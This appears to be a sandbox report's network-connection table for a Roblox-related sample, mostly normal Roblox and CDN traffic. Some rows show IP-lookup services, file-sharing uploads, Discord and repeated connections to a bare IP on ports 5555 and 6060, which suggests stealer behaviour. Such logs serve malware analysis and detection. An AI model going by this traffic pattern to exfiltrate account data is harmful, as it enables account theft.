| US | 8.8.8.8:53 | www.roblox.com | udp |
| FR | 128.116.122.3:443 | www.roblox.com | tcp |
| US | 8.8.8.8:53 | css.rbxcdn.com | udp |
| US | 8.8.8.8:53 | static.rbxcdn.com | udp |
| US | 8.8.8.8:53 | js.rbxcdn.com | udp |
| GB | 54.230.10.81:443 | css.rbxcdn.com | tcp |
| GB | 54.230.10.81:443 | css.rbxcdn.com | tcp |
| GB | 54.230.10.81:443 | css.rbxcdn.com | tcp |
| GB | 54.230.10.81:443 | css.rbxcdn.com | tcp |
| GB | 54.230.10.81:443 | css.rbxcdn.com | tcp |
| GB | 54.230.10.81:443 | css.rbxcdn.com | tcp |
| GB | 13.224.81.3:443 | js.rbxcdn.com | tcp |
| GB | 13.224.81.3:443 | js.rbxcdn.com | tcp |
| GB | 13.224.81.3:443 | js.rbxcdn.com | tcp |
| GB | 13.224.81.3:443 | js.rbxcdn.com | tcp |
| GB | 13.224.81.3:443 | js.rbxcdn.com | tcp |
| GB | 13.224.81.3:443 | js.rbxcdn.com | tcp |
| FR | 3.162.38.18:443 | static.rbxcdn.com | tcp |
| FR | 128.116.122.3:443 | www.roblox.com | udp |
| US | 8.8.8.8:53 | roblox-api.arkoselabs.com | udp |
| GB | 54.230.10.71:443 | roblox-api.arkoselabs.com | tcp |
| US | 8.8.8.8:53 | metrics.roblox.com | udp |
| US | 8.8.8.8:53 | apis.roblox.com | udp |
| FR | 128.116.122.3:443 | apis.roblox.com | tcp |
| FR | 128.116.122.3:443 | apis.roblox.com | tcp |
| US | 8.8.8.8:53 | 4.119.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.122.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.10.230.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.81.224.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.38.162.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.10.230.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.rbxcdn.com | udp |
| BE | 88.221.83.113:443 | apis.rbxcdn.com | tcp |
| US | 8.8.8.8:53 | locale.roblox.com | udp |
| US | 8.8.8.8:53 | images.rbxcdn.com | udp |
| GB | 54.230.10.71:443 | roblox-api.arkoselabs.com | udp |
| GB | 54.230.10.95:443 | images.rbxcdn.com | tcp |
| GB | 54.230.10.95:443 | images.rbxcdn.com | tcp |
| GB | 54.230.10.95:443 | images.rbxcdn.com | tcp |
| GB | 54.230.10.95:443 | images.rbxcdn.com | tcp |
| GB | 54.230.10.95:443 | images.rbxcdn.com | tcp |
| GB | 54.230.10.95:443 | images.rbxcdn.com | tcp |
| GB | 54.230.10.81:443 | css.rbxcdn.com | tcp |
| US | 8.8.8.8:53 | auth.roblox.com | udp |
| FR | 128.116.122.3:443 | auth.roblox.com | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 142.250.178.10:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | 113.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.10.230.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ecsv2.roblox.com | udp |
| US | 8.8.8.8:53 | 10.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | assetgame.roblox.com | udp |
| US | 8.8.8.8:53 | ncs.roblox.com | udp |
| GB | 54.230.10.71:443 | roblox-api.arkoselabs.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | udp |
| US | 8.8.8.8:53 | realtime-signalr.roblox.com | udp |
| US | 8.8.8.8:53 | lms.roblox.com | udp |
| US | 8.8.8.8:53 | thumbnails.roblox.com | udp |
| FR | 128.116.122.4:443 | lms.roblox.com | tcp |
| US | 8.8.8.8:53 | contacts.roblox.com | udp |
| US | 8.8.8.8:53 | notifications.roblox.com | udp |
| US | 8.8.8.8:53 | accountsettings.roblox.com | udp |
| US | 8.8.8.8:53 | economy.roblox.com | udp |
| US | 8.8.8.8:53 | friends.roblox.com | udp |
| US | 8.8.8.8:53 | privatemessages.roblox.com | udp |
| US | 8.8.8.8:53 | trades.roblox.com | udp |
| US | 8.8.8.8:53 | sea1-128-116-115-3.roblox.com | udp |
| US | 8.8.8.8:53 | aws-us-east-2b-lms.rbx.com | udp |
| US | 8.8.8.8:53 | c0.rbxcdn.com | udp |
| US | 8.8.8.8:53 | sin2-128-116-97-3.roblox.com | udp |
| US | 8.8.8.8:53 | bom1-128-116-104-4.roblox.com | udp |
| US | 8.8.8.8:53 | aws-ap-east-1b-lms.rbx.com | udp |
| US | 8.8.8.8:53 | lax2-128-116-116-3.roblox.com | udp |
| US | 8.8.8.8:53 | aws-ap-east-1c-lms.rbx.com | udp |
| US | 8.8.8.8:53 | roblox-poc.global.ssl.fastly.net | udp |
| US | 8.8.8.8:53 | aws-eu-west-2a-lms.rbx.com | udp |
| US | 128.116.115.3:443 | sea1-128-116-115-3.roblox.com | tcp |
| US | 18.190.37.100:443 | aws-us-east-2b-lms.rbx.com | tcp |
| SG | 128.116.97.3:443 | sin2-128-116-97-3.roblox.com | tcp |
| IN | 128.116.104.4:443 | bom1-128-116-104-4.roblox.com | tcp |
| US | 128.116.116.3:443 | lax2-128-116-116-3.roblox.com | tcp |
| HK | 18.162.172.125:443 | aws-ap-east-1b-lms.rbx.com | tcp |
| GB | 18.172.88.108:443 | c0.rbxcdn.com | tcp |
| HK | 43.198.68.158:443 | aws-ap-east-1c-lms.rbx.com | tcp |
| US | 151.101.129.194:443 | roblox-poc.global.ssl.fastly.net | tcp |
| GB | 18.170.155.214:443 | aws-eu-west-2a-lms.rbx.com | tcp |
| US | 8.8.8.8:53 | cs.ns1p.net | udp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| DE | 52.28.200.16:443 | cs.ns1p.net | tcp |
| US | 8.8.8.8:53 | tr.rbxcdn.com | udp |
| SE | 184.31.15.65:443 | tr.rbxcdn.com | tcp |
| US | 8.8.8.8:53 | s.ns1p.net | udp |
| DE | 52.28.200.16:443 | s.ns1p.net | tcp |
| SG | 128.116.97.3:443 | sin2-128-116-97-3.roblox.com | tcp |
| HK | 18.162.172.125:443 | aws-ap-east-1b-lms.rbx.com | tcp |
| HK | 43.198.68.158:443 | aws-ap-east-1c-lms.rbx.com | tcp |
| US | 8.8.8.8:53 | iad4-128-116-102-3.roblox.com | udp |
| US | 128.116.102.3:443 | iad4-128-116-102-3.roblox.com | tcp |
| GB | 142.250.178.10:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | 4.122.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.129.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.155.170.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.88.172.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.37.190.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.200.28.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.115.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.104.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.116.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.15.31.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.68.198.43.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.172.162.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.97.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.102.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c0cfly.rbxcdn.com | udp |
| US | 205.234.175.102:443 | c0cfly.rbxcdn.com | tcp |
| US | 8.8.8.8:53 | dfw2-128-116-95-3.roblox.com | udp |
| US | 128.116.95.3:443 | dfw2-128-116-95-3.roblox.com | tcp |
| FR | 128.116.122.4:443 | lms.roblox.com | udp |
| US | 8.8.8.8:53 | presence.roblox.com | udp |
| US | 8.8.8.8:53 | 102.175.234.205.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.95.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | b.ns1p.net | udp |
| US | 8.8.8.8:53 | 131.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gofile.io | udp |
| FR | 51.38.43.18:443 | gofile.io | tcp |
| FR | 51.38.43.18:443 | gofile.io | tcp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 51.38.43.18:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | s.gofile.io | udp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| US | 8.8.8.8:53 | 18.43.38.51.in-addr.arpa | udp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| US | 8.8.8.8:53 | ad.a-ads.com | udp |
| DE | 148.251.194.214:443 | ad.a-ads.com | tcp |
| US | 8.8.8.8:53 | static.a-ads.com | udp |
| US | 8.8.8.8:53 | 210.242.75.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.194.251.148.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cold2.gofile.io | udp |
| FR | 31.14.70.251:443 | cold2.gofile.io | tcp |
| FR | 31.14.70.251:443 | cold2.gofile.io | tcp |
| US | 8.8.8.8:53 | 251.70.14.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.173.189.20.in-addr.arpa | udp |
| FR | 128.116.122.3:443 | presence.roblox.com | udp |
| US | 8.8.8.8:53 | filesbox.io | udp |
| FI | 135.181.109.1:443 | filesbox.io | tcp |
| US | 8.8.8.8:53 | 1.109.181.135.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| FI | 135.181.109.1:443 | filesbox.io | tcp |
| NL | 91.92.241.69:5555 | tcp | |
| US | 8.8.8.8:53 | 69.241.92.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | e2c65.gcp.gvt2.com | udp |
| US | 34.161.115.43:443 | e2c65.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 35.215.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.115.161.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gvt2.com | udp |
| GB | 172.217.169.3:443 | beacons.gvt2.com | tcp |
| US | 8.8.8.8:53 | 3.169.217.172.in-addr.arpa | udp |
| FR | 128.116.122.3:443 | presence.roblox.com | udp |
| US | 8.8.8.8:53 | static.rbxcdn.com | udp |
| US | 8.8.8.8:53 | www.roblox.com | udp |
| US | 8.8.8.8:53 | js.rbxcdn.com | udp |
| US | 8.8.8.8:53 | css.rbxcdn.com | udp |
| FR | 128.116.122.4:443 | lms.roblox.com | udp |
| US | 8.8.8.8:53 | aws-us-east-2a-lms.rbx.com | udp |
| US | 8.8.8.8:53 | syd1-128-116-51-3.roblox.com | udp |
| US | 8.8.8.8:53 | ams2-128-116-21-3.roblox.com | udp |
| US | 128.116.95.3:443 | dfw2-128-116-95-3.roblox.com | tcp |
| US | 8.8.8.8:53 | lhr2-128-116-119-3.roblox.com | udp |
| NL | 128.116.21.3:443 | ams2-128-116-21-3.roblox.com | tcp |
| US | 8.8.8.8:53 | c0ak.rbxcdn.com | udp |
| US | 3.132.183.229:443 | aws-us-east-2a-lms.rbx.com | tcp |
| AU | 128.116.51.3:443 | syd1-128-116-51-3.roblox.com | tcp |
| US | 8.8.8.8:53 | nrt1-128-116-120-3.roblox.com | udp |
| US | 8.8.8.8:53 | mia4-128-116-45-3.roblox.com | udp |
| GB | 128.116.119.3:443 | lhr2-128-116-119-3.roblox.com | tcp |
| BE | 88.221.83.27:443 | c0ak.rbxcdn.com | tcp |
| JP | 128.116.120.3:443 | nrt1-128-116-120-3.roblox.com | tcp |
| US | 128.116.45.3:443 | mia4-128-116-45-3.roblox.com | tcp |
| AU | 128.116.51.3:443 | syd1-128-116-51-3.roblox.com | tcp |
| JP | 128.116.120.3:443 | nrt1-128-116-120-3.roblox.com | tcp |
| US | 8.8.8.8:53 | 3.21.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.119.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.183.132.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.45.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.120.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.51.116.128.in-addr.arpa | udp |
| FR | 128.116.122.4:443 | lms.roblox.com | udp |
| US | 8.8.8.8:53 | games.roblox.com | udp |
| US | 8.8.8.8:53 | voice.roblox.com | udp |
| US | 8.8.8.8:53 | auth.roblox.com | udp |
| US | 8.8.8.8:53 | tcp | |
| NL | 91.92.241.69:6060 | 91.92.241.69 | tcp |
| US | 8.8.8.8:53 | setup.rbxcdn.com | udp |
| GB | 18.172.88.60:443 | setup.rbxcdn.com | tcp |
| US | 8.8.8.8:53 | 60.88.172.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | client-telemetry.roblox.com | udp |
| FR | 128.116.122.3:443 | client-telemetry.roblox.com | tcp |
| US | 8.8.8.8:53 | ecsv2.roblox.com | udp |
| FR | 128.116.122.3:443 | ecsv2.roblox.com | tcp |
| N/A | 127.0.0.1:53470 | tcp | |
| US | 8.8.8.8:53 | clientsettingscdn.roblox.com | udp |
| ES | 23.60.216.235:443 | clientsettingscdn.roblox.com | tcp |
| US | 8.8.8.8:53 | setup.rbxcdn.com | udp |
| GB | 18.172.88.40:443 | setup.rbxcdn.com | tcp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | 235.216.60.23.in-addr.arpa | udp |
| N/A | 127.0.0.1:53483 | tcp | |
| N/A | 127.0.0.1:53486 | tcp | |
| N/A | 127.0.0.1:53489 | tcp | |
| US | 8.8.8.8:53 | 40.88.172.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | store8.gofile.io | udp |
| US | 206.168.191.31:443 | store8.gofile.io | tcp |
| US | 8.8.8.8:53 | 31.191.168.206.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0x0.st | udp |
| GB | 18.172.88.40:443 | setup.rbxcdn.com | tcp |
| GB | 18.172.88.40:443 | setup.rbxcdn.com | tcp |
| DE | 168.119.145.117:443 | 0x0.st | tcp |
| US | 8.8.8.8:53 | 117.145.119.168.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.roblox.com | udp |
| FR | 128.116.122.3:443 | www.roblox.com | tcp |
| US | 8.8.8.8:53 | msedge.api.cdp.microsoft.com | udp |
| US | 23.102.129.60:443 | msedge.api.cdp.microsoft.com | tcp |
| US | 8.8.8.8:53 | 60.129.102.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.13.205:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 205.13.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | msedge.f.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 206.168.191.31:443 | store8.gofile.io | tcp |
| IT | 217.20.58.101:80 | msedge.f.tlu.dl.delivery.mp.microsoft.com | tcp |
| DE | 168.119.145.117:443 | 0x0.st | tcp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
| US | 206.168.191.31:443 | store8.gofile.io | tcp |
| DE | 168.119.145.117:443 | 0x0.st | tcp |
| US | 8.8.8.8:53 | freeimage.host | udp |
| US | 104.21.22.122:443 | freeimage.host | tcp |
| US | 8.8.8.8:53 | 122.22.21.104.in-addr.arpa | udp |
| NL | 91.92.241.69:6060 | 91.92.241.69 | tcp |
| FR | 128.116.122.3:443 | www.roblox.com | tcp |
| US | 8.8.8.8:53 | users.roblox.com | udp |
| FR | 128.116.122.3:443 | users.roblox.com | tcp |
| US | 206.168.191.31:443 | store8.gofile.io | tcp |
| DE | 168.119.145.117:443 | 0x0.st | tcp |
| FR | 128.116.122.3:443 | users.roblox.com | tcp |
| US | 8.8.8.8:53 | inventory.roblox.com | udp |
| FR | 128.116.122.3:443 | inventory.roblox.com | tcp |
| FR | 128.116.122.3:443 | inventory.roblox.com | tcp |
| US | 8.8.8.8:53 | auth.roblox.com | udp |
| FR | 128.116.122.3:443 | auth.roblox.com | tcp |
| US | 8.8.8.8:53 | economy.roblox.com | udp |
| FR | 128.116.122.3:443 | economy.roblox.com | tcp |
| FR | 128.116.122.3:443 | economy.roblox.com | tcp |
| FR | 128.116.122.3:443 | economy.roblox.com | tcp |
| FR | 128.116.122.3:443 | economy.roblox.com | tcp |
| FR | 128.116.122.3:443 | economy.roblox.com | tcp |
| FR | 128.116.122.3:443 | economy.roblox.com | tcp |
| FR | 128.116.122.3:443 | economy.roblox.com | tcp |
| FR | 128.116.122.3:443 | economy.roblox.com | tcp |
| FR | 128.116.122.3:443 | economy.roblox.com | tcp |
| FR | 128.116.122.3:443 | economy.roblox.com | tcp |
| FR | 128.116.122.3:443 | economy.roblox.com | tcp |
| FR | 128.116.122.3:443 | economy.roblox.com | tcp |
| FR | 128.116.122.3:443 | economy.roblox.com | tcp |
| FR | 128.116.122.3:443 | economy.roblox.com | tcp |
| FR | 128.116.122.3:443 | economy.roblox.com | tcp |
| FR | 128.116.122.3:443 | economy.roblox.com | tcp |
| FR | 128.116.122.3:443 | economy.roblox.com | tcp |
| FR | 128.116.122.3:443 | economy.roblox.com | tcp |
| FR | 128.116.122.3:443 | economy.roblox.com | tcp |
| FR | 128.116.122.3:443 | economy.roblox.com | tcp |
| FR | 128.116.122.3:443 | economy.roblox.com | tcp |
| FR | 128.116.122.3:443 | economy.roblox.com | tcp |
| FR | 128.116.122.3:443 | economy.roblox.com | tcp |
| FR | 128.116.122.3:443 | economy.roblox.com | tcp |
| FR | 128.116.122.3:443 | economy.roblox.com | tcp |
| FR | 128.116.122.3:443 | economy.roblox.com | tcp |
| FR | 128.116.122.3:443 | economy.roblox.com | tcp |
| FR | 128.116.122.3:443 | economy.roblox.com | tcp |
| FR | 128.116.122.3:443 | economy.roblox.com | tcp |
| FR | 128.116.122.3:443 | economy.roblox.com | tcp |
| FR | 128.116.122.3:443 | economy.roblox.com | tcp |
| NL | 91.92.241.69:6060 | 91.92.241.69 | tcp |
| N/A | 127.0.0.1:54721 | tcp | |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | udp |
| US | 8.8.8.8:53 | roblox.com | udp |
| FR | 128.116.122.3:443 | economy.roblox.com | udp |
| GB | 128.116.119.4:443 | roblox.com | udp |
| FR | 128.116.122.3:443 | economy.roblox.com | tcp |
| US | 8.8.8.8:53 | static.rbxcdn.com | udp |
| BE | 88.221.83.41:443 | static.rbxcdn.com | tcp |
| US | 8.8.8.8:53 | roblox-api.arkoselabs.com | udp |
| GB | 54.230.10.71:443 | roblox-api.arkoselabs.com | udp |
| US | 8.8.8.8:53 | 41.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | metrics.roblox.com | udp |
| US | 8.8.8.8:53 | apis.roblox.com | udp |
| FR | 128.116.122.3:443 | apis.roblox.com | udp |
| FR | 128.116.122.3:443 | apis.roblox.com | tcp |
| US | 8.8.8.8:53 | realtime-signalr.roblox.com | udp |
| FR | 128.116.122.4:443 | lms.roblox.com | udp |
| FR | 128.116.122.3:443 | realtime-signalr.roblox.com | tcp |
| FR | 128.116.122.4:443 | lms.roblox.com | tcp |
| US | 8.8.8.8:53 | ecsv2.roblox.com | udp |
| US | 8.8.8.8:53 | locale.roblox.com | udp |
| US | 8.8.8.8:53 | nrt1-128-116-120-3.roblox.com | udp |
| US | 128.116.115.3:443 | sea1-128-116-115-3.roblox.com | tcp |
| US | 8.8.8.8:53 | aws-us-west-2c-lms.rbx.com | udp |
| US | 8.8.8.8:53 | gold.roblox.com | udp |
| US | 8.8.8.8:53 | lga2-128-116-32-3.roblox.com | udp |
| SG | 128.116.97.3:443 | sin2-128-116-97-3.roblox.com | tcp |
| US | 8.8.8.8:53 | c0aws.rbxcdn.com | udp |
| JP | 128.116.120.3:443 | nrt1-128-116-120-3.roblox.com | tcp |
| US | 8.8.8.8:53 | aws-eu-west-2a-lms.rbx.com | udp |
| US | 128.116.95.3:443 | dfw2-128-116-95-3.roblox.com | tcp |
| GB | 18.172.88.11:443 | c0aws.rbxcdn.com | tcp |
| US | 128.116.32.3:443 | lga2-128-116-32-3.roblox.com | tcp |
| US | 50.112.127.98:443 | aws-us-west-2c-lms.rbx.com | tcp |
| GB | 18.170.155.214:443 | aws-eu-west-2a-lms.rbx.com | tcp |
| JP | 128.116.120.3:443 | nrt1-128-116-120-3.roblox.com | tcp |
| SG | 128.116.97.3:443 | sin2-128-116-97-3.roblox.com | tcp |
| US | 8.8.8.8:53 | 11.88.172.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.32.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.127.112.50.in-addr.arpa | udp |
| FR | 128.116.122.4:443 | lms.roblox.com | udp |
| FR | 128.116.122.4:443 | lms.roblox.com | tcp |
| US | 8.8.8.8:53 | tr.rbxcdn.com | udp |
| SE | 184.31.15.64:443 | tr.rbxcdn.com | tcp |
| US | 8.8.8.8:53 | 64.15.31.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | js.rbxcdn.com | udp |
| US | 8.8.8.8:53 | css.rbxcdn.com | udp |
| GB | 54.230.10.81:443 | css.rbxcdn.com | tcp |
| FR | 18.244.28.99:443 | js.rbxcdn.com | tcp |
| US | 8.8.8.8:53 | 99.28.244.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fra2-128-116-123-3.roblox.com | udp |
| US | 8.8.8.8:53 | cdg1-128-116-122-3.roblox.com | udp |
| US | 8.8.8.8:53 | aws-ap-east-1c-lms.rbx.com | udp |
| AU | 128.116.51.3:443 | syd1-128-116-51-3.roblox.com | tcp |
| US | 8.8.8.8:53 | fra4-128-116-44-3.roblox.com | udp |
| US | 128.116.45.3:443 | mia4-128-116-45-3.roblox.com | tcp |
| US | 128.116.116.3:443 | lax2-128-116-116-3.roblox.com | tcp |
| US | 8.8.8.8:53 | aws-eu-central-1a-lms.rbx.com | udp |
| DE | 128.116.123.3:443 | fra2-128-116-123-3.roblox.com | tcp |
| DE | 128.116.44.3:443 | fra4-128-116-44-3.roblox.com | tcp |
| DE | 52.29.85.22:443 | aws-eu-central-1a-lms.rbx.com | tcp |
| HK | 43.198.68.158:443 | aws-ap-east-1c-lms.rbx.com | tcp |
| US | 8.8.8.8:53 | 3.123.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.44.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.85.29.52.in-addr.arpa | udp |
| AU | 128.116.51.3:443 | syd1-128-116-51-3.roblox.com | tcp |
| HK | 43.198.68.158:443 | aws-ap-east-1c-lms.rbx.com | tcp |
| US | 8.8.8.8:53 | s.ns1p.net | udp |
| DE | 3.123.132.50:443 | s.ns1p.net | tcp |
| US | 128.116.95.3:443 | dfw2-128-116-95-3.roblox.com | tcp |
| GB | 18.172.88.11:443 | c0aws.rbxcdn.com | tcp |
| US | 8.8.8.8:53 | 50.132.123.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | waw1-128-116-124-3.roblox.com | udp |
| PL | 128.116.124.3:443 | waw1-128-116-124-3.roblox.com | tcp |
| US | 8.8.8.8:53 | b.ns1p.net | udp |
| US | 8.8.8.8:53 | t6.rbxcdn.com | udp |
| BE | 88.221.83.10:443 | t6.rbxcdn.com | tcp |
| US | 8.8.8.8:53 | 10.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.124.116.128.in-addr.arpa | udp |
| FR | 128.116.122.3:443 | cdg1-128-116-122-3.roblox.com | tcp |
| FR | 128.116.122.3:443 | cdg1-128-116-122-3.roblox.com | tcp |
| US | 128.116.32.3:443 | lga2-128-116-32-3.roblox.com | tcp |
| US | 8.8.8.8:53 | images.rbxcdn.com | udp |
| GB | 54.230.10.43:443 | images.rbxcdn.com | tcp |
| US | 8.8.8.8:53 | js.stripe.com | udp |
| US | 151.101.64.176:443 | js.stripe.com | tcp |
| US | 8.8.8.8:53 | 43.10.230.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | followings.roblox.com | udp |
| FR | 128.116.122.3:443 | followings.roblox.com | tcp |
| US | 8.8.8.8:53 | aws-ap-east-1b-lms.rbx.com | udp |
| US | 8.8.8.8:53 | mia2-128-116-127-3.roblox.com | udp |
| US | 8.8.8.8:53 | atl1-128-116-99-3.roblox.com | udp |
| US | 8.8.8.8:53 | pulsar.roblox.com | udp |
| US | 8.8.8.8:53 | aws-us-west-1a-lms.rbx.com | udp |
| IN | 128.116.104.4:443 | bom1-128-116-104-4.roblox.com | tcp |
| HK | 18.162.172.125:443 | aws-ap-east-1b-lms.rbx.com | tcp |
| PL | 128.116.124.3:443 | pulsar.roblox.com | tcp |
| US | 54.215.216.30:443 | aws-us-west-1a-lms.rbx.com | tcp |
| US | 128.116.127.3:443 | mia2-128-116-127-3.roblox.com | tcp |
| US | 128.116.99.3:443 | atl1-128-116-99-3.roblox.com | tcp |
| HK | 18.162.172.125:443 | aws-ap-east-1b-lms.rbx.com | tcp |
| US | 8.8.8.8:53 | 176.64.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | badges.roblox.com | udp |
| US | 8.8.8.8:53 | 3.99.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.127.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.216.215.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | m.stripe.network | udp |
| US | 8.8.8.8:53 | auth.roblox.com | udp |
| US | 8.8.8.8:53 | m.stripe.com | udp |
| US | 44.239.127.109:443 | m.stripe.com | tcp |
| US | 8.8.8.8:53 | 109.127.239.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ncs.roblox.com | udp |
| FR | 128.116.122.3:443 | ncs.roblox.com | udp |
| US | 8.8.8.8:53 | msedge.api.cdp.microsoft.com | udp |
| NL | 13.95.26.4:443 | msedge.api.cdp.microsoft.com | tcp |
| US | 8.8.8.8:53 | 4.26.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| SE | 184.31.15.50:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | 50.15.31.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | msedge.api.cdp.microsoft.com | udp |
| IE | 20.166.2.191:443 | msedge.api.cdp.microsoft.com | tcp |
| US | 8.8.8.8:53 | 191.2.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 152.199.19.161:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | 161.19.199.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.roblox.com | udp |
| FR | 128.116.122.3:443 | www.roblox.com | udp |
| FR | 128.116.122.3:443 | www.roblox.com | udp |
| FR | 128.116.122.3:443 | www.roblox.com | udp |
| FR | 128.116.122.3:443 | www.roblox.com | udp |
| US | 8.8.8.8:53 | www.roblox.com | udp |
| FR | 128.116.122.3:443 | www.roblox.com | udp |
| FR | 128.116.122.3:443 | www.roblox.com | udp |
| US | 8.8.8.8:53 | www.roblox.com | udp |
| FR | 128.116.122.3:443 | www.roblox.com | udp |
| FR | 128.116.122.3:443 | www.roblox.com | udp |
| US | 8.8.8.8:53 | www.roblox.com | udp |
| FR | 128.116.122.3:443 | www.roblox.com | udp |
| FR | 128.116.122.3:443 | www.roblox.com | udp |
| FR | 128.116.122.3:443 | www.roblox.com | udp |
| US | 8.8.8.8:53 | www.roblox.com | udp |
| FR | 128.116.122.3:443 | www.roblox.com | udp |
| US | 8.8.8.8:53 | ncs.roblox.com | udp |
| FR | 128.116.122.3:443 | ncs.roblox.com | udp |
| FR | 128.116.122.3:443 | ncs.roblox.com | udp |
Files
\??\pipe\crashpad_4628_IXONXJYHDNZQJAFH
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
